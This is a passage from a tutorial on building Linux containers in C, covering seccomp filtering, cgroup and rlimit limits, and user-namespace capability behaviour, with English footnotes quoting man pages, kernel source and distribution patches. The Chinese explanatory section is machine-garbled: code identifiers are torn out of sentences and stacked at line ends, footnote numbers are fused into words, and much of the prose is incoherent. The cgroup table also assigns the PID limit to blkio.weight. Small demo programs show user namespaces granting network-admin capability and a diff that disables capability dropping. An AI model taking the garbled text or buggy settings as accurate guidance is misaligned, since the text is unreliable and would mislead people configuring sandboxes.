	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(perf_event_open), 0)

我们将设置为 0。这个名字有点模糊：它专门防止和 'd 二进制文件使用他们的额外权限执行。这有一定的安全性好处（它使容器中的非特权用户更难利用 setuid 或 setcap 可执行文件中的漏洞成为例如，容器内根目录）。但这有点奇怪，而且意味着例如，这在容器中不起作用非特权用户56.PR_SET_NO_NEW_PRIVS``setuid``setcap``ping

<<syscalls>> +=

	    || seccomp_attr_set(ctx, SCMP_FLTATR_CTL_NNP, 0)

我们实际上会将它应用到流程中，并发布上下文。

<<syscalls>> +=

	    || seccomp_load(ctx)) {
		if (ctx) seccomp_release(ctx);
		fprintf(stderr, "failed: %m\n");
		return 1;
	}
	seccomp_release(ctx);
	fprintf(stderr, "done.\n");
	return 0;
}

允许的系统调用

以下是默认 Docker 不允许的系统调用策略，但此代码允许：

_sysctl`已过时并被禁用 默认值[为 57](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.57)。 [58](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.58)、[59](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.59)、60、[61](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.61)、62、[63](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.63) 和 [64](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.64) 在现代 Linux 上不存在。`alloc_hugepages``free_hugepages``bdflush``create_module``nfsservctl``perfctr``get_kernel_syms``setup
clock_adjtime`、[65](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.65) 和 [66](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.66) 取决于 。`clock_settime``adjtime``CAP_SYS_TIME
pciconfig_read`和 [67](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.67) 和所有 [68](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.68) 的副作用操作由 防止。`pciconfig_write``quotactl``CAP_SYS_ADMIN
get_mempolicy`并显示有关内存的信息 系统的布局，但它们可以由非特权进程进行， 并且可能是无害的。 可以通过以下方式制作 非特权进程，并显示有关 PCI 设备的信息。 [69](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.69) 和 [70](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.70) 泄露了一些关于 文件系统，但我认为这些都不是关键的东西。 是 或多或少已过时，但仅用于加载共享库 在用户空间 [71](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.71) 中`getpagesize``pciconfig_iobase``ustat``sysfs``uselib
sync_file_range2`是与交换参数 订单[72](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.72).`sync_file_range

readdir大部分已经过时，但可能是无害的73.

kexec_file_load`并被 [74](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.74) 阻止。`kexec_load``CAP_SYS_BOOT
nice`只能用于降低优先级，而不使用 [75](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.75)。`CAP_SYS_NICE
oldfstat`、 、 、 和 只是它们各自功能的旧版本。我希望他们能 具有与现代相同的安全属性。`oldlstat``oldolduname``oldstat``olduname
perfmonctl` [76](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.76) 仅在 IA-64型。 [只有 77](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.77)、[78](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.78) 和 [79](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.79) 以及 [80](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.80) 可在 PowerPC 上使用。 仅适用于 斯帕克[81](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.81). 仅适用于 Sparc64，无论如何都应该是无害的[82](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.82).`ppc_rtas``spu_create``spu_run``subpage_prot``utrap_install``kern_features

我不认为我们的设置有问题（但它可能可能用于规避基于路径的 MAC）。pivot_root

preadv2`并且只是 和 / 和 的扩展，它们是“分散输入”/“收集输出” 和 [83](https://blog.lizzie.io/linux-containers-in-500-loc.html#fn.83) 的扩展。`pwritev2``preadv``pwritev``readv``writev``read``write

资源

我们希望防止行为不良的子进程拒绝为系统其余部分提供服务84.Cgroups 让我们特别限制内存和 CPU 时间;限制 PID 计数和 IO 使用也很有用。内核中有一个非常有用的文档树上写着它。

和文件系统是 cgroup 系统。有点不同，而且是单一化的在我的系统上，所以我将在这里使用第一个版本。cgroup``cgroup2``cgroup2

例如，Cgroup 命名空间与 mount 略有不同命名空间。在进入 cgroup 之前，我们需要创建 cgroup 命名空间;一旦我们这样做了，该 cgroup 的行为将类似于根 cgroup 在命名空间85 中。这还不是最多的相关，因为包含的进程无法挂载 cgroup 文件系统或者为了反省，但彻底是件好事。/proc

我将设置一个结构，这样我就不必过多地重复自己，以下说明：

设置，所以包含进程及其子进程的总内存不能超过 1GB 用户空间86.memory/$hostname/memory.limit_in_bytes
设置，以便包含的进程及其子进程的总和不能超过 1GB 用户空间87 中的内存。memory/$hostname/memory.kmem.limit_in_bytes
设置为 256。CPU 份额是 1024;256 * 4 = 1024，因此这让包含的进程采用繁忙系统上的四分之一 CPU 时间最多为88。cpu/$hostname/cpu.shares
设置，允许包含的进程和它的孩子最多有 64 个 PID。这很有用，因为那里有是每个用户的 pid 限制，如果包含的进程占用过多89.pids/$hostname/pid.max
设置为 50，使其低于其余值并相应地确定优先级90.blkio/$hostname/weight

我还将通过向每个过程写入“0”来添加调用过程。{memory,cpu,blkio,pids}/$hostname/tasks

<<resources>> +=

#define MEMORY "1073741824"
#define SHARES "256"
#define PIDS "64"
#define WEIGHT "10"
#define FD_COUNT 64

struct cgrp_control {
   
	char control[256];
	struct cgrp_setting {
   
		char name[256];
		char value[256];
	} **settings;
};
struct cgrp_setting add_to_tasks = {
   
	.name = "tasks",
	.value = "0"
};

struct cgrp_control *cgrps[] = {
   
	& (struct cgrp_control) {
   
		.control = "memory",
		.settings = (struct cgrp_setting *[]) {
   
			& (struct cgrp_setting) {
   
				.name = "memory.limit_in_bytes",
				.value = MEMORY
			},
			& (struct cgrp_setting) {
   
				.name = "memory.kmem.limit_in_bytes",
				.value = MEMORY
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
   
		.control = "cpu",
		.settings = (struct cgrp_setting *[]) {
   
			& (struct cgrp_setting) {
   
				.name = "cpu.shares",
				.value = SHARES
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
   
		.control = "pids",
		.settings = (struct cgrp_setting *[]) {
   
			& (struct cgrp_setting) {
   
				.name = "pids.max",
				.value = PIDS
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
   
		.control = "blkio",
		.settings = (struct cgrp_setting *[]) {
   
			& (struct cgrp_setting) {
   
				.name = "blkio.weight",
				.value = PIDS
			},
			&add_to_tasks,
			NULL
		}
	},
	NULL
};

写入 cgroups 版本 1 文件系统的工作方式如下这91：

在每个控制器中，您可以创建一个名称为的 cgroup。对于内存，.mkdir``mkdir /sys/fs/cgroup/memory/$hostname
在里面，你可以写入单个文件来设置值。例如。echo $MEMORY > /sys/fs/cgroup/memory/$hostname/memory.limit_in_bytes
你可以用 pid 将进程树添加到 cgroup 中。“0” 是一个特殊的值，表示“写作过程”。tasks

因此，我将遍历该结构并填充值。

<<resources>> +=

int resources(struct child_config *config)
{
   
	fprintf(stderr, "=> setting cgroups...");
	for (struct cgrp_control **cgrp = cgrps; *cgrp; cgrp++) {
   
		char dir[PATH_MAX] = {
   0};
		fprintf(stderr, "%s...", (*cgrp)->control);
		if (snprintf(dir, sizeof(dir), "/sys/fs/cgroup/%s/%s",
			     (*cgrp)->control, config->hostname) == -1) {
   
			return -1;
		}
		if (mkdir(dir, S_IRUSR | S_IWUSR | S_IXUSR)) {
   
			fprintf(stderr, "mkdir %s failed: %m\n", dir);
			return -1;
		}
		for (struct cgrp_setting **setting = (*cgrp)->settings; *setting; setting++) {
   
			char path[PATH_MAX] = {
   0};
			int fd = 0;
			if (snprintf(path, sizeof(path), "%s/%s", dir,
				     (*setting)->name) == -1) {
   
				fprintf(stderr, "snprintf failed: %m\n");
				return -1;
			}
			if ((fd = open(path, O_WRONLY)) == -1) {
   
				fprintf(stderr, "opening %s failed: %m\n", path);
				return -1;
			}
			if (write(fd, (*setting)->value, strlen((*setting)->value)) == -1) {
   
				fprintf(stderr, "writing to %s failed: %m\n", path);
				close(fd);
				return -1;
			}
			close(fd);
		}
	}
	fprintf(stderr, "done.\n");

我还将降低文件描述符数量的硬性限制。这文件描述符编号（如 PID 数）是按用户划分的，依此类推我们希望防止容器内进程占用所有他们。设置硬性限制会为此设置永久上限进程树，因为我已经删除了 92。CAP_SYS_RESOURCE

<<resources>> +=

	fprintf(stderr, "=> setting rlimit...");
	if (setrlimit(RLIMIT_NOFILE,
		      & (struct rlimit) {
   
			.rlim_max = FD_COUNT,
			.rlim_cur = FD_COUNT,
		})) {
   
		fprintf(stderr, "failed: %m\n");
		return 1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}

我们还想清理此主机名的 cgroup。有内置功能，但我们需要更改全系统价值，以干净利落地做到这一点93.由于我们让进程等待包含的进程，它是这样做很简单。首先，我们将流程移回成根 ;然后，由于子进程已完成，并且将 PID 命名空间保留为其子命名空间，即空。在这一点上，我们可以安全地。contained``contained``tasks``SIGKILLS``tasks``rmdir

<<resources>> +=

int free_resources(struct child_config *config)
{
   
	fprintf(stderr, "=> cleaning cgroups...");
	for (struct cgrp_control **cgrp = cgrps; *cgrp; cgrp++) {
   
		char dir[PATH_MAX] = {
   0};
		char task[PATH_MAX] = {
   0};
		int task_fd = 0;
		if (snprintf(dir, sizeof(dir), "/sys/fs/cgroup/%s/%s",
			     (*cgrp)->control, config->hostname) == -1
		    || snprintf(task, sizeof(task), "/sys/fs/cgroup/%s/tasks",
				(*cgrp)->control) == -1) {
   
			fprintf(stderr, "snprintf failed: %m\n");
			return -1;
		}
		if ((task_fd = open(task, O_WRONLY)) == -1) {
   
			fprintf(stderr, "opening %s failed: %m\n", task);
			return -1;
		}
		if (write(task_fd, "0", 2) == -1) {
   
			fprintf(stderr, "writing to %s failed: %m\n", task);
			close(task_fd);
			return -1;
		}
		close(task_fd);
		if (rmdir(dir)) {
   
			fprintf(stderr, "rmdir %s failed: %m", dir);
			return -1;
		}
	}
	fprintf(stderr, "done.\n");
	return 0;
}

联网

容器网络对此的解释有点过分了空间。它通常像这样工作：

创建桥接设备。
创建一个虚拟以太网对，并将一端连接到网桥。
Put the other end in the network namespace.
For outside networking access, the host needs to be set to forward (and possibly NAT) packets.

Having multiple contained processes sharing a bridge device would mean they’re both on the same LAN from the host’s perspective. So ARP spoofing is a recurring issue with containers that work this way94.

The canonical way to do this from C is the interface; it would probably be easier to use . rtnetlink``ip link ...

We could also limit the network usage with the cgroup controller95. net_prio

Footnotes:

“Linux User Namespaces Might Not Be Secure Enough” by Erica Windisch:

If a (real) root user has had the SYS_CAP_ADMIN capability removed, but then creates a user namespace, this capability is restored for the (fake) root user. That is, before creating the namespace, ‘mount’ would be denied, but following the creation of the user namespace, the ‘mount’ syscall would magically work again, albeit in a limited fashion. While limited in function, it’s significant enough that given a (real) root user and a kernel with user namespaces, Linux capabilities may be completely subverted.

and man 7 user_namespaces says:

The child process created by clone(2) with the CLONE_NEWUSER flag starts out with a complete set of capabilities in the new user namespace.

and “Understanding and Hardening Linux Containers” again

User namespaces also allows for ``interesting’’ intersections of security models, whereas full root capabilities are granted to new namespace. This can allow CLONE_NEWUSER to effectively use CAP_NET_ADMIN over other network namespaces as they are exposed, and if containers are not in use. Additionally, as we have seen many times, processes with CAP_NET_ADMIN have a large attack surface and have resulted in a number of different kernel vulnerabilities. This may allow an unprivileged user namespace to target a large attack surface (the kernel networking subsystem) whereas a privileged container with reduced capabilities would not have such permissions. See Section 5.5 on page 39 for a more in-depth discussion on this topic.

We can demonstrate this behavior (on a host with user namespaces compiled in) with

subverting_networking.c
/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -static  subverting_networking.c \*/
/*                   -o subverting_networking" */
/* End: */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sched.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/sockios.h>

int main (int argc, char **argv)
{
   
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) {
   
		fprintf(stderr, "++ unshare failed: %m\n");
		return 1;
	}
	/* this is how you create a bridge... */
	int sock = 0;
	if ((sock = socket(PF_LOCAL, SOCK_STREAM, 0)) == -1) {
   
		fprintf(stderr, "++ socket failed: %m\n");
		return 1;
	}
	if (ioctl(sock, SIOCBRADDBR, "br0")) {
   
		fprintf(stderr, "++ ioctl failed: %m\n");
		close(sock);
		return 1;
	}
	close(sock);
	fprintf(stderr, "++ success!\n");
	return 0;
}
  alpine-kernel-dev:~$ whoami
  lizzie
  alpine-kernel-dev:~$ ./subverting_networking
  ++ success!
  alpine-kernel-dev:~$

but we’re not actually that powerful.

subverting_setfcap.c
/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -lcap -static subverting_setfcap.c \*/
/*                   -o subverting_setfcap" */
/* End: */
#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <linux/capability.h>
#include <sys/capability.h>

int main (int argc, char **argv)
{
   
	if (unshare(CLONE_NEWUSER)) {
   
		fprintf(stderr, "++ unshare failed: %m\n");
		return 1;
	}
	cap_t cap = cap_from_text("cap_net_admin+ep");
	if (cap_set_file("example", cap)) {
   
		fprintf(stderr, "++ cap_set_file failed: %m\n");
		cap_free(cap);
		return 1;
	}
	cap_free(cap);
	return 0;
}
  alpine-kernel-dev:~$ whoami
  lizzie
  alpine-kernel-dev:~$ touch example
  alpine-kernel-dev:~$ ./subverting_setfcap
  ++ cap_set_file failed: Operation not permitted

init/Kconfig:1207@c8d2bc

config USER_NS
	bool "User namespace"
	default n
	help
	  This allows containers, i.e. vservers, to use user namespaces
	  to provide different user info for different servers.

	  When user namespaces are enabled in the kernel it is
	  recommended that the MEMCG option also be enabled and that
	  user-space use the memory control groups to limit the amount
	  of memory a memory unprivileged users can use.

	  If unsure, say N.

Ubuntu switches on, but patches it so that it unprivileged use can be disabled with a sysctl, . CONFIG_USER_NS``unpriviliged_userns_clone

92e575e769cc50a9bfb50fb58fe94aab4f2a2bff

commit 92e575e769cc50a9bfb50fb58fe94aab4f2a2bff
Author: Serge Hallyn <redacted>
Date:   Tue Jan 5 20:12:21 2016 +0000

    UBUNTU: SAUCE: add a sysctl to disable unprivileged user namespace unsharing
    
    It is turned on by default, but can be turned off if admins prefer or,
    more importantly, if a security vulnerability is found.
    
    The intent is to use this as mitigation so long as Ubuntu is on the
    cutting edge of enablement for things like unprivileged filesystem
    mounting.
    
    (This patch is tweaked from the one currently still in Debian sid, which
    in turn came from the patch we had in saucy)
    
    Signed-off-by: Serge Hallyn <redacted>
    [bwh: Remove unneeded binary sysctl bits]
    Signed-off-by: Tim Gardner <redacted>

Debian has the same behavior:

debian/patches/debian/add-sysctl-to-allow-unprivileged-CLONE_NEWUSER-by-default.patch

From: Serge Hallyn <redacted>
Date: Fri, 31 May 2013 19:12:12 +0000 (+0100)
Subject: add sysctl to disallow unprivileged CLONE_NEWUSER by default
Origin: http://kernel.ubuntu.com/git?p=serge%2Fubuntu-saucy.git;a=commit;h=5c847404dcb2e3195ad0057877e1422ae90892b8

add sysctl to disallow unprivileged CLONE_NEWUSER by default

This is a short-term patch.  Unprivileged use of CLONE_NEWUSER
is certainly an intended feature of user namespaces.  However
for at least saucy we want to make sure that, if any security
issues are found, we have a fail-safe.

Signed-off-by: Serge Hallyn <redacted>
[bwh: Remove unneeded binary sysctl bits]
---

Grsecurity disables it entirely for users without , , and . CAP_SYS_ADMIN``CAP_SETUID``CAP_SETGID

https://grsecurity.net/test/grsecurity-3.1-4.7.9-201610200819.patch

--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -84,6 +84,21 @@ int create_user_ns(struct cred *new)
 	    !kgid_has_mapping(parent_ns, group))
 		return -EPERM;
 
+#ifdef CONFIG_GRKERNSEC
+	/*
+	 * This doesn't really inspire confidence:
+	 * http://marc.info/?l=linux-kernel&m=135543612731939&w=2
+	 * http://marc.info/?l=linux-kernel&m=135545831607095&w=2
+	 * Increases kernel attack surface in areas developers
+	 * previously cared little about ("low importance due
+	 * to requiring "root" capability")
+	 * To be removed when this code receives *proper* review
+	 */
+	if (!capable(CAP_SYS_ADMIN) || !capable(CAP_SETUID) ||
+			!capable(CAP_SETGID))
+		return -EPERM;
+#endif

and Arch Linux has it off.

{linux} 3.13 add CONFIG_USER_NS

Comment by William Kennington (Webhostbudd) - Sunday, 06 October 2013, 03:55 GMT

I agree with Florian, allowing non-root users to take advantage of
elevating themselves to a local root seems like a huge attack
surface. Preferably this would be a sysctl with a huge warning
attached to it when it is switched on.

Comment by Daniel Micay (thestinger) - Monday, 24 November 2014, 03:55 GMT

[...]  Arch doesn't add new features via patches. If you want to see
this feature enabled, then land something like this upstream. Note
that CONFIG_USER_NS is already enabled in the linux-grsec package
because it fully removes the ability to have unprivileged user
namespaces.

It would have been cool to include Red Hat’s patches here, but I couldn’t find them.

Most of this section is cribbed from the example at the bottom of man 2 clone.

clone_stack.c
/* -*- compile-command: "gcc -Wall -Werror clone_stack.c -o clone_stack" -*- */
#define _GNU_SOURCE
#include <sched.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define STACK_SIZE (1024 * 1024)

int child (void *_)
{
   
	int stack_value = 0;
	fprintf(stderr, "pre-execve, stack is ~%p\n", &stack_value);
	execve("./show_stack", (char  *[]) {
   ",/show_stack", 0}, NULL);
	return 0;
}

int main (int argc, char **argv) {
   
	void *stack = malloc(STACK_SIZE);
	clone(child, stack + STACK_SIZE, SIGCHLD, NULL);
	wait(NULL);
	return 0;
}
show_stack.c
/* -*- compile-command: "gcc -Wall -Werror -static show_stack.c -o show_stack" -*- */
#include <stdio.h>

int main (int argc, char **argv)
{
   
	int stack_value = 0;
	fprintf(stderr, "post-execve, stack is ~%p\n", &stack_value);
	return 0;
}
  [lizzie@empress linux-containers-in-500-loc]$ ./clone_stack
  pre-execve, stack is ~0x7f3f98deefec
  post-execve, stack is ~0x7ffd14d2291c

The stack grows down on x86, so the fact that the address is higher numerically post-execve means that a new stack has been allocated.

I thought this might be undefined behavior, since does point past the last item of the array, but point 8 of 6.5.6 [Additive operators] in ISO-9899 has us covered: stack + STACK_SIZE

If both the pointer operand and the result point to elements of the same array object, or one past the last element of the array object, the evaluation shall not produce an overflow; otherwise, the behavior is undefined. If the result points one past the last element of the array object, it shall not be used as the operand of a unary * operator that is evaluated.

i.e., the pointer addition is valid, but dereferencing it wouldn’t be.

I wasn’t confident that was enough to wait for the process and all of its children, but when the root of a pid namespace closes, all of its children get : waitpid``SIGKILL

man 7 pid_namespaces:

If the “init” process of a PID namespace terminates, the kernel terminates all of the processes in the namespace via a SIGKILL signal. This behavior reflects the fact that the “init” process is essential for the correct operation of a PID namespace.

Also verified this myself, before I found that:

persistent_child.c
/* -*- compile-command: "gcc -Wall -Werror -static persistent_child.c -o persistent_child" -*- */
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main (int argc, char **argv)
{
   
	switch (fork()) {
   
	case -1:
		fprintf(stderr, "++ fork failed: %m\n");
		return 1;
	case 0:;
		int fd = 0;
		if ((fd = open("persistent_child.log",
			       O_CREAT | O_APPEND | O_WRONLY,
			       S_IRUSR | S_IWUSR)) == -1) {
   
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		size_t count = 0;
		while (count < 100) {
   
			if (dprintf(fd, "%lu\n", count++) < 0) {
   
				fprintf(stderr, "++ dprintf failed: %m\n");
				close(fd);
				return 1;
			}
			sleep(1);
		}
		close(fd);
		return 0;
	default:
		sleep(2);
		return 0;
	}
}
[lizzie@empress l-c-i-500-l]$ touch persistent_child.log 
[lizzie@empress l-c-i-500-l]$ chmod 666 persistent_child.log 
[lizzie@empress l-c-i-500-l]$ sudo strace -f ./contained -m . -u 0 -c ./persistent_child
execve("./contained", ["./contained", "-m", ".", "-u", "0", "-c", "./persistent_child"], [/* 15 vars */]) = 0
brk(NULL)                               = 0x605490
# ...
[pid   736] clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x6b68d0) = 2
strace: Process 746 attached
[pid   736] nanosleep({
   2, 0},  <unfinished ...>
[pid   746] open("persistent_child.log", O_WRONLY|O_CREAT|O_APPEND, 0600) = 3
[pid   746] fstat(3, {
   st_mode=S_IFREG|0666, st_size=4, ...}) = 0
[pid   746] lseek(3, 0, SEEK_CUR)       = 0
[pid   746] write(3, "0\n", 2)          = 2
[pid   746] nanosleep({
   1, 0}, 0x3fee2d718d0) = 0
[pid   746] fstat(3, {
   st_mode=S_IFREG|0666, st_size=6, ...}) = 0
[pid   746] lseek(3, 0, SEEK_CUR)       = 6
[pid   746] write(3, "1\n", 2)          = 2
[pid   746] nanosleep({
   1, 0},  <unfinished ...>
[pid   736] <... nanosleep resumed> 0x3fee2d718d0) = 0
[pid   736] exit_group(0)               = ?
[pid   746] +++ killed by SIGKILL +++
[pid   736] +++ exited with 0 +++
# ...

<<namespaces>> +=

	close(sockets[1]);
	sockets[1] = 0;
	if (handle_child_uid_map(child_pid, sockets[0])) {
   
		err = 1;
		goto kill_and_finish_child;
	}

	goto finish_child;
kill_and_finish_child:
	if (child_pid) kill(child_pid, SIGKILL);
finish_child:;
	int child_status = 0;
	waitpid(child_pid, &child_status, 0);
	err |= WEXITSTATUS(child_status);
clear_resources:
	free_resources(&config);
	free(stack);

A process setting its own user namespace is pretty limited8, so the parent will wait until the child enters the user namespace, and then write a mapping to its and . uid_map``gid_map

man 7 user_namespaces

	In order for  a process to write  to the /proc/[pid]/uid_map
	(/proc/[pid]/gid_map)   file,    all   of    the   following
	requirements must be met:

	1. The writing process must have the CAP_SETUID (CAP_SETGID)
	   capability in the user namespace of the process pid.

	2. The writing process must either  be in the user namespace
	   of the process pid or be  in the parent user namespace of
	   the process pid.

	3. The  mapped user  IDs (group  IDs)  must in  turn have  a
	   mapping in the parent user namespace.

	4. One of the following two cases applies:

	   *  Either   the  writing   process  has   the  CAP_SETUID
		 (CAP_SETGID) capability in the parent user namespace.

		 +  No further restrictions apply: the process can make
		    mappings to  arbitrary user IDs (group  IDs) in the
		    parent user namespace.

	   *  Or otherwise all of the following restrictions apply:

		 +  The data written to  uid_map (gid_map) must consist
		    of a  single line  that maps the  writing process's
		    effective  user ID  (group ID)  in the  parent user
		    namespace  to a  user  ID (group  ID)  in the  user
		    namespace.

		 +  The writing  process must  have the  same effective
		    user  ID  as  the  process that  created  the  user
		    namespace.

		 +  In  the case  of gid_map,  use of  the setgroups(2)
		    system call must first be denied by writing deny to
		    the /proc/[pid]/setgroups  file (see  below) before
		    writing to gid_map.

	Writes  that violate  the above  rules fail  with the  error
	EPERM.

gid`, , and are separate from in : `sgid``egid``group_info``struct cred

include/linux/cred.h:95@c8d2bc

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *	task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *	upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */
struct cred {
   
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
};

For example, in the -handling-code: test_perm``/proc/sys

fs/proc/proc_sysctl.c:406@c8d2bc

static int test_perm(int mode, int op)
{
	if (uid_eq(current_euid(), GLOBAL_ROOT_UID))
		mode >>= 6;
	else if (in_egroup_p(GLOBAL_ROOT_GID))
		mode >>= 3;
	if ((op & ~mode & (MAY_READ|MAY_WRITE|MAY_EXEC)) == 0)
		return 0;
	return -EACCES;
}

try_regain_cap.c
/* -*- compile-command: "gcc -Wall -Werror -static try_regain_cap.c -o try_regain_cap" -*- */
#include <linux/capability.h>
#include <sys/prctl.h>
#include <stdio.h>

int main (int argc, char  **argv)
{
	if (prctl(PR_CAPBSET_READ, CAP_MKNOD, 0, 0, 0)) {
 		fprintf(stderr, "++ have CAP_MKNOD\n");
	} else {
		fprintf(stderr, "++ don't have CAP_MKNOD\n");
	}
	return 0;
}

If we drop the bounding set, files with extra capabilities don’t get those capabilities:

[lizzie@empress l-c-i-500-l]$ sudo setcap "cap_mknod+p" try_regain_cap
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.lVLNB1...done.
=> trying a user namespace...writing /proc/852/uid_map...writing /proc/852/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ don't have CAP_MKNOD
=> cleaning cgroups...done.

but if we don’t, they work:

allow_all_caps.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..6ab1719 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -53,10 +53,7 @@ int capabilities()
 	size_t num_caps = sizeof(drop_caps) / sizeof(*drop_caps);
 	fprintf(stderr, "bounding...");
 	for (size_t i = 0; i < num_caps; i++) {
-		if (prctl(PR_CAPBSET_DROP, drop_caps[i], 0, 0, 0)) {
-			fprintf(stderr, "prctl failed: %m\n");
-			return 1;
-		}
+		continue;
 	}
 	fprintf(stderr, "inheritable...");
 	cap_t caps = NULL;
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_all_caps -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Qnzw2A...done.
=> trying a user namespace...writing /proc/940/uid_map...writing /proc/940/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ have CAP_MKNOD
=> cleaning cgroups...done.

(and if we set , execve fails because it’s considered a “capability-dumb binary”) +ep

[lizzie@empress l-c-i-500-l]$ sudo setcap "cap_mknod+ep" try_regain_cap
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c try_regain_cap
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Esog3p...done.
=> trying a user namespace...writing /proc/994/uid_map...writing /proc/994/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
execve failed! Operation not permitted.
=> cleaning cgroups...done.

man 7 capabilities

   Safety checking for capability-dumb binaries
	A  capability-dumb binary  is an  application that  has been
	marked to have file capabilities, but has not been converted
	to  use the  libcap(3) API  to manipulate  its capabilities.
	(In  other words,  this  is  a traditional  set-user-ID-root
	program that has been switched to use file capabilities, but
	whose   code   has   not   been   modified   to   understand
	capabilities.)    For  such   applications,  the   effective
	capability  bit  is  set  on  the file,  so  that  the  file
	permitted  capabilities  are  automatically enabled  in  the
	process effective  set when executing the  file.  The kernel
	recognizes a file which has the effective capability bit set
	as capability-dumb  for the  purpose of the  check described
	here.

	When executing  a capability-dumb binary, the  kernel checks
	if the process obtained all permitted capabilities that were
	specified in  the file  permitted set, after  the capability
